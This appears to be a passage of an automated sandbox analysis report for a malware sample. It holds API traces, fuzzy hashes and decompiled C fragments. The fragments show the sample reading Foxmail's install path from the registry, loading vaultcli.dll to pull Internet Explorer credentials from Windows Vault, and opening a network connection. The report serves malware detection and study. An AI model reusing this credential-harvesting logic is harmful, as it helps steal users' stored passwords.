                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: bae5c44c3dbe92e57d96a6ca93c6eb0d90f2ead63d4c74c9300c2f00da431a07
                                      • Instruction ID: a89d08e8c76f68c3a04fe8db53f2f50707915a5d881dc39b51e52607c375eb68
                                      • Opcode Fuzzy Hash: bae5c44c3dbe92e57d96a6ca93c6eb0d90f2ead63d4c74c9300c2f00da431a07
                                      • Instruction Fuzzy Hash: 61F0C835620209BBDB2A9FA5D81DB9FBFF8EF04715F40016AFA05A2254CB704A40DB80
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E00258A40(void* __ecx) {
                                      				int _v8;
                                      				void* _v12;
                                      				void* _t7;
                                      
                                      				// 0x80000001 = HKEY_CURRENT_USER, 0x20019 = KEY_READ
                                      				if(RegOpenKeyExA(0x80000001, "software\\Aerofox\\FoxmailPreview", 0, 0x20019,  &_v12) != 0) {
                                      					L3:
                                      					_t7 = 0;
                                      				} else {
                                      					_v8 = 0x104; // buffer size in bytes, MAX_PATH (260)
                                      					// reads the "Executable" value into the fixed buffer at 0x2667a0
                                      					if(RegQueryValueExA(_v12, "Executable", 0, 0, 0x2667a0,  &_v8) != 0) {
                                      						goto L3;
                                      					} else {
                                      						// strips the file name, leaving the directory of the configured Foxmail executable
                                      						PathRemoveFileSpecA(0x2667a0);
                                      						_t7 = 1;
                                      					}
                                      				}
                                      				// the key handle in _v12 is never closed
                                      				return _t7;
                                      			}


                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,software\Aerofox\FoxmailPreview,00000000,00020019,?), ref: 00258A5B
                                      • RegQueryValueExA.ADVAPI32(?,Executable,00000000,00000000,002667A0,?), ref: 00258A82
                                      • PathRemoveFileSpecA.SHLWAPI(002667A0), ref: 00258A8D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileOpenPathQueryRemoveSpecValue
                                      • String ID: Executable$software\Aerofox\FoxmailPreview
                                      • API String ID: 3687894118-2371247776
                                      • Opcode ID: ce28d2946c47cb4f575e78145554b2bc9d819bcf23e031e3c7123413b24d107d
                                      • Instruction ID: 1b73fbff028bffb82ea10d2038bdbce7d716636d33292fb3726ecf62681f9386
                                      • Opcode Fuzzy Hash: ce28d2946c47cb4f575e78145554b2bc9d819bcf23e031e3c7123413b24d107d
                                      • Instruction Fuzzy Hash: 6AF08274654209BAEB208B60EC4AFAA7AAC9745B04F104015FA01F2081D6F09A589524
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 057e46dc81e991ccb48b19c0a65fe5c99a49b55e037045a7e103addf4282233e
                                      • Instruction ID: 91c65998ac72402b520191e1a32379e7e043bb3767fd96361962abd390d5d8da
                                      • Opcode Fuzzy Hash: 057e46dc81e991ccb48b19c0a65fe5c99a49b55e037045a7e103addf4282233e
                                      • Instruction Fuzzy Hash: 8441E43AA203009FCB25DF7CC884A6EB7F5EF88718F958569D615EB345D731A901CB80
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 012E9320
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 012E9343
                                        • Part of subcall function 012E6EDF: HeapAlloc.KERNEL32(00000000,?,?,?,012E852B,00001000,?,?,?,?,012E3843), ref: 012E6F11
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 012E9369
                                      • _free.LIBCMT ref: 012E937C
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 012E938B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                      • String ID:
                                      • API String ID: 2278895681-0
                                      • Opcode ID: 30451572ee86a79edf3b38d1d5f1fd546f7afee9be13047e0240b5e1dfa1eb0d
                                      • Instruction ID: c65cd2116a6aa02e44954e58d537e666e9fd42466919838b8f4c971781249007
                                      • Opcode Fuzzy Hash: 30451572ee86a79edf3b38d1d5f1fd546f7afee9be13047e0240b5e1dfa1eb0d
                                      • Instruction Fuzzy Hash: 4B01D8726112167F7B3157BB5C8CC7B6EEDDAC2AA8355021BFB09C2184EA618C4182B0
                                      Uniqueness

                                      Uniqueness Score: 0.55%

                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,012E621F,012E47EE), ref: 012E7906
                                      • SetLastError.KERNEL32(00000000,00000004,000000FF,?,?,?,012E621F,012E47EE), ref: 012E792C
                                      • _free.LIBCMT ref: 012E796C
                                      • _free.LIBCMT ref: 012E799F
                                      • SetLastError.KERNEL32(00000000,?,012E621F,012E47EE), ref: 012E79AC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: a2a2825040c8506dd08615a6ff3f89213adf2b2cc26c72be4f6ff0732f03f6e5
                                      • Instruction ID: cf02fabc5c07b1a1d9e19a1142a2e14c5897392aeb5bdaeec8a5a1f93788afb8
                                      • Opcode Fuzzy Hash: a2a2825040c8506dd08615a6ff3f89213adf2b2cc26c72be4f6ff0732f03f6e5
                                      • Instruction Fuzzy Hash: 7911C87522020276D62737397C5CD3B76DD9FA9774F950615F72893298FF30880143A0
                                      Uniqueness

                                      Uniqueness Score: 0.32%

                                      APIs
                                      • GetLastError.KERNEL32(?,?,012E379D,?,?,?,012E385A,00000000), ref: 012E77B7
                                      • _free.LIBCMT ref: 012E780E
                                      • _free.LIBCMT ref: 012E7842
                                      • SetLastError.KERNEL32(00000000,00000000), ref: 012E784F
                                      • SetLastError.KERNEL32(00000000,00000004,000000FF,?,?,012E385A,00000000), ref: 012E785B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: 982ed22f274de8f19483be98fc9050c3b690782d77d91adb0e311a8a29b80ee4
                                      • Instruction ID: 1d94f32a0e9571a94e6b0b517506668163da8b67e1e1b2e89d56ceccd6f8d5e3
                                      • Opcode Fuzzy Hash: 982ed22f274de8f19483be98fc9050c3b690782d77d91adb0e311a8a29b80ee4
                                      • Instruction Fuzzy Hash: 5211C8352301036AE627B7387C5CE3B3ADE9FB5731FA00226FB24925D8FE20840197A1
                                      Uniqueness

                                      Uniqueness Score: 0.32%

                                      APIs
                                      • WSAStartup.WS2_32(00000202,?), ref: 0025D361
                                      • socket.WS2_32(00000002,00000001,00000000), ref: 0025D372
                                      • gethostbyname.WS2_32(?), ref: 0025D380
                                      • htons.WS2_32(?), ref: 0025D3A6
                                      • connect.WS2_32(00000000,?,00000010), ref: 0025D3B9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Startupconnectgethostbynamehtonssocket
                                      • String ID:
                                      • API String ID: 2405761414-0
                                      • Opcode ID: 8261c7f9f858f85fd212caeb96f8f600efdf3cb70a476f207268a0675db9347e
                                      • Instruction ID: 9ee36cf39f2875ae797c8530496a3033d64dcab3cfc4b55ca484d5ce69807a8d
                                      • Opcode Fuzzy Hash: 8261c7f9f858f85fd212caeb96f8f600efdf3cb70a476f207268a0675db9347e
                                      • Instruction Fuzzy Hash: 6E01C471610305ABD2209B64AC4DE77B7ACEF44721F004969FD54C61A1E6B0C96C87A6
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      APIs
                                      • _free.LIBCMT ref: 012E982D
                                        • Part of subcall function 012E628A: HeapFree.KERNEL32(00000000,00000000), ref: 012E62A0
                                        • Part of subcall function 012E628A: GetLastError.KERNEL32(?,?,012E98A8,?,00000000,?,00000000,?,012E98CF,?,00000007,?,?,012E9CD3,?,?), ref: 012E62B2
                                      • _free.LIBCMT ref: 012E983F
                                      • _free.LIBCMT ref: 012E9851
                                      • _free.LIBCMT ref: 012E9863
                                      • _free.LIBCMT ref: 012E9875
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 5f0b73848811af4d5fb4b4331561da60213cb88918c5a9c3d3b576dd36dfd178
                                      • Instruction ID: f261331043b5734ace45aac826f8d337ebb1f220464812c8bb426942f23ab9a3
                                      • Opcode Fuzzy Hash: 5f0b73848811af4d5fb4b4331561da60213cb88918c5a9c3d3b576dd36dfd178
                                      • Instruction Fuzzy Hash: 96F01232524205EBDA61DA58E5C9C2AB7DDFE14B18FD80817F24DD7558CB30F8C08B64
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      C-Code - Quality: 100%
                                      			E0025A64F(void* __ecx) {
                                      				int _t15;
                                      				void* _t18;
                                      
                                      				// releases five module handles stored in the object at +0xa8..+0xb8 and zeroes each field
                                      				_t18 = __ecx;
                                      				FreeLibrary( *(__ecx + 0xb4));
                                      				 *((intOrPtr*)(_t18 + 0xb4)) = 0;
                                      				FreeLibrary( *(_t18 + 0xa8));
                                      				 *(_t18 + 0xa8) = 0;
                                      				FreeLibrary( *(_t18 + 0xac));
                                      				 *(_t18 + 0xac) = 0;
                                      				FreeLibrary( *(_t18 + 0xb8));
                                      				 *(_t18 + 0xb8) = 0;
                                      				_t15 = FreeLibrary( *(_t18 + 0xb0));
                                      				 *(_t18 + 0xb0) = 0;
                                      				return _t15; // result of the last FreeLibrary call
                                      			}


                                      APIs
                                      • FreeLibrary.KERNEL32(?,00000001,?,00000000,00259DD8), ref: 0025A660
                                      • FreeLibrary.KERNEL32(?,?,00000000,00259DD8), ref: 0025A670
                                      • FreeLibrary.KERNEL32(?,?,00000000,00259DD8), ref: 0025A67E
                                      • FreeLibrary.KERNEL32(?,?,00000000,00259DD8), ref: 0025A68C
                                      • FreeLibrary.KERNEL32(?,?,00000000,00259DD8), ref: 0025A69A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 30e84c7d98a5b85df78ec05586fd61fe45005fd421750b7d469e09f50697eeb6
                                      • Instruction ID: d164fdfcbd72855e23fe46740b938a3cefe3078934cba7a02d8b866c0234062e
                                      • Opcode Fuzzy Hash: 30e84c7d98a5b85df78ec05586fd61fe45005fd421750b7d469e09f50697eeb6
                                      • Instruction Fuzzy Hash: DBF01571B00B16BEC7485F358C84B86FE2AFF09260F00422BD12C42221CB712434DFD2
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      C-Code - Quality: 100%
                                      			E0025A2CD(void* __ecx) {
                                      				int _t15;
                                      				void* _t18;
                                      
                                      				_t18 = __ecx;
                                      				FreeLibrary( *(__ecx + 0xb4));
                                      				 *((intOrPtr*)(_t18 + 0xb4)) = 0;
                                      				FreeLibrary( *(_t18 + 0xa8));
                                      				 *(_t18 + 0xa8) = 0;
                                      				FreeLibrary( *(_t18 + 0xac));
                                      				 *(_t18 + 0xac) = 0;
                                      				FreeLibrary( *(_t18 + 0xb8));
                                      				 *(_t18 + 0xb8) = 0;
                                      				_t15 = FreeLibrary( *(_t18 + 0xb0));
                                      				 *(_t18 + 0xb0) = 0;
                                      				return _t15;
                                      			}


                                      APIs
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,00259885), ref: 0025A2DE
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,00259885), ref: 0025A2EE
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,00259885), ref: 0025A2FC
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,00259885), ref: 0025A30A
                                      • FreeLibrary.KERNEL32(?,?,?,00000000,00259885), ref: 0025A318
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 30e84c7d98a5b85df78ec05586fd61fe45005fd421750b7d469e09f50697eeb6
                                      • Instruction ID: d164fdfcbd72855e23fe46740b938a3cefe3078934cba7a02d8b866c0234062e
                                      • Opcode Fuzzy Hash: 30e84c7d98a5b85df78ec05586fd61fe45005fd421750b7d469e09f50697eeb6
                                      • Instruction Fuzzy Hash: DBF01571B00B16BEC7485F358C84B86FE2AFF09260F00422BD12C42221CB712434DFD2
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      C-Code - Quality: 61%
                                      			E00259EA9(void* __ecx, void* __edx, void* __eflags) {
                                      				char _v8;
                                      				char _v12;
                                      				char _v16;
                                      				char _v20;
                                      				char _v24;
                                      				intOrPtr _v28;
                                      				char _v32;
                                      				char _v36;
                                      				char _v40;
                                      				char _v44;
                                      				char _v48;
                                      				char _v52;
                                      				char _v56;
                                      				char _v60;
                                      				char _v64;
                                      				char _v68;
                                      				char _v72;
                                      				char _v76;
                                      				char _v80;
                                      				char _v84;
                                      				char _v92;
                                      				char _v96;
                                      				char _v100;
                                      				void* _t124;
                                      				void* _t127;
                                      				intOrPtr _t129;
                                      				void* _t133;
                                      				intOrPtr _t147;
                                      				void* _t148;
                                      				void* _t159;
                                      				void* _t162;
                                      				void* _t186;
                                      				char _t226;
                                      				intOrPtr _t229;
                                      				char _t234;
                                      				void* _t235;
                                      
                                      				_t234 = 0;
                                      				_t186 = __ecx;
                                      				_t226 = 0;
                                      				_v16 = 0;
                                      				_v44 = 0;
                                      				_v20 = 0;
                                      				_v12 = 0;
                                      				_v8 = 0;
                                      				_v84 = 0;
                                      				if(E0025A1FF(__ecx) != 0) {
                                      					_push( &_v16);
                                      					_push(0);
                                      					_push(0x266140);
                                      					if( *((intOrPtr*)(__ecx + 0x8c))() == 0) {
                                      						_push( &_v20);
                                      						_push( &_v44);
                                      						_push(0x200);
                                      						_push(_v16);
                                      						if( *((intOrPtr*)(__ecx + 0x94))() == 0) {
                                      							_t240 = _v44;
                                      							if(_v44 != 0) {
                                      								_v80 = 0;
                                      								_v40 = 0;
                                      								_v36 = 0;
                                      								do {
                                      									_t124 = E0025A1CC(_t240);
                                      									_push(0x10);
                                      									_push(0x266130);
                                      									if(_t124 == 0) {
                                      										_push(_t226);
                                      										_v28 = _v20 + _v40;
                                      										_t127 = E00251000();
                                      										_t235 = _t235 + 0xc;
                                      										__eflags = _t127;
                                      										if(__eflags == 0) {
                                      											E00253412( &_v32,  *((intOrPtr*)(_v28 + 0x10)));
                                      											_t133 = E00253075( &_v32, E00253412( &_v64, L"Internet Explorer"));
                                      											E00255A2D(_v64);
                                      											_v64 = _t234;
                                      											__eflags = _t133;
                                      											if(__eflags != 0) {
                                      												asm("movaps xmm0, [0x2649c0]");
                                      												asm("movups [ebp-0x60], xmm0");
                                      												E00253264( &_v100, E00253412( &_v68,  *((intOrPtr*)(_v8 + 0x14)) + 0x20));
                                      												E00255A2D(_v68);
                                      												_v68 = _t234;
                                      												E00253264( &_v96, E00253412( &_v72,  *((intOrPtr*)(_v8 + 0x18)) + 0x20));
                                      												E00255A2D(_v72);
                                      												_v12 = _t234;
                                      												_t147 = _v28;
                                      												_v72 = _t234;
                                      												_t148 =  *((intOrPtr*)(_t186 + 0x98))(_v16, _t147,  *((intOrPtr*)(_t147 + 0x14)),  *((intOrPtr*)(_t147 + 0x18)), _t234, _t234, _t234,  &_v12);
                                      												__eflags = _t148;
                                      												if(_t148 == 0) {
                                      													_v8 = _v12;
                                      													__eflags =  *((intOrPtr*)(_v28 + 0x1c)) + 0x20;
                                      													E00253264( &_v84, E00253412( &_v76,  *((intOrPtr*)(_v28 + 0x1c)) + 0x20));
                                      													E00255A2D(_v76);
                                      													_v76 = _t234;
                                      												}
                                      												_t235 = _t235 - 0x10;
                                      												E00251EB9(_t235,  &_v100);
                                      												E00251EEF(_t186);
                                      												E0025138F( &_v100);
                                      											}
                                      											E00255A2D(_v32);
                                      											_v32 = _t234;
                                      											goto L18;
                                      										}
                                      									} else {
                                      										_t226 = _v36 + _v20;
                                      										_push(_t226);
                                      										_v8 = _t226;
                                      										_t159 = E00251000();
                                      										_t235 = _t235 + 0xc;
                                      										if(_t159 == 0) {
                                      											E00253412( &_v24,  *((intOrPtr*)(_t226 + 0x10)));
                                      											_t162 = E00253075( &_v24, E00253412( &_v48, L"Internet Explorer"));
                                      											E00255A2D(_v48);
                                      											_v48 = _t234;
                                      											if(_t162 != 0) {
                                      												_t229 = _v8;
                                      												asm("movaps xmm0, [0x2649c0]");
                                      												asm("movups [ebp-0x60], xmm0");
                                      												E00253264( &_v100, E00253412( &_v52,  *((intOrPtr*)(_t229 + 0x14)) + 0x20));
                                      												E00255A2D(_v52);
                                      												_v52 = _t234;
                                      												E00253264( &_v96, E00253412( &_v56,  *((intOrPtr*)(_t229 + 0x18)) + 0x20));
                                      												E00255A2D(_v56);
                                      												_v12 = _t234;
                                      												_push( &_v12);
                                      												_push(_t234);
                                      												_push(_t234);
                                      												_push(_t234);
                                      												_push( *((intOrPtr*)(_t229 + 0x18)));
                                      												_v56 = _t234;
                                      												_push( *((intOrPtr*)(_t229 + 0x14)));
                                      												_push(_t229);
                                      												_push(_v16);
                                      												if( *((intOrPtr*)(_t186 + 0x98))() == 0) {
                                      													_v8 = _v12;
                                      													E00253264( &_v92, E00253412( &_v60,  *((intOrPtr*)(_v12 + 0x1c)) + 0x20));
                                      													E00255A2D(_v60);
                                      													_v60 = _t234;
                                      												}
                                      												_t235 = _t235 - 0x10;
                                      												E00251EB9(_t235,  &_v100);
                                      												E00251EEF(_t186);
                                      												E0025138F( &_v100);
                                      											}
                                      											E00255A2D(_v24);
                                      											_v24 = _t234;
                                      											L18:
                                      											_t226 = _v8;
                                      										}
                                      									}
                                      									_v36 = _v36 + 0x38;
                                      									_t129 = _v80 + 1;
                                      									_v40 = _v40 + 0x34;
                                      									_v80 = _t129;
                                      								} while (_t129 < _v44);
                                      								_t234 = _v84;
                                      							}
                                      						}
                                      					}
                                      				}
                                      				if(_v20 != 0) {
                                      					 *((intOrPtr*)(_t186 + 0xa0))(_v20);
                                      				}
                                      				if(_v16 != 0) {
                                      					 *((intOrPtr*)(_t186 + 0x90))( &_v16);
                                      				}
                                      				FreeLibrary( *(_t186 + 0xc0));
                                      				E00255A2D(_t234);
                                      				E00255A2D(0);
                                      				return E00255A2D(0);
                                      			}


                                      APIs
                                        • Part of subcall function 0025A1FF: LoadLibraryA.KERNEL32(vaultcli.dll), ref: 0025A207
                                      • FreeLibrary.KERNEL32(?), ref: 0025A1AC
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
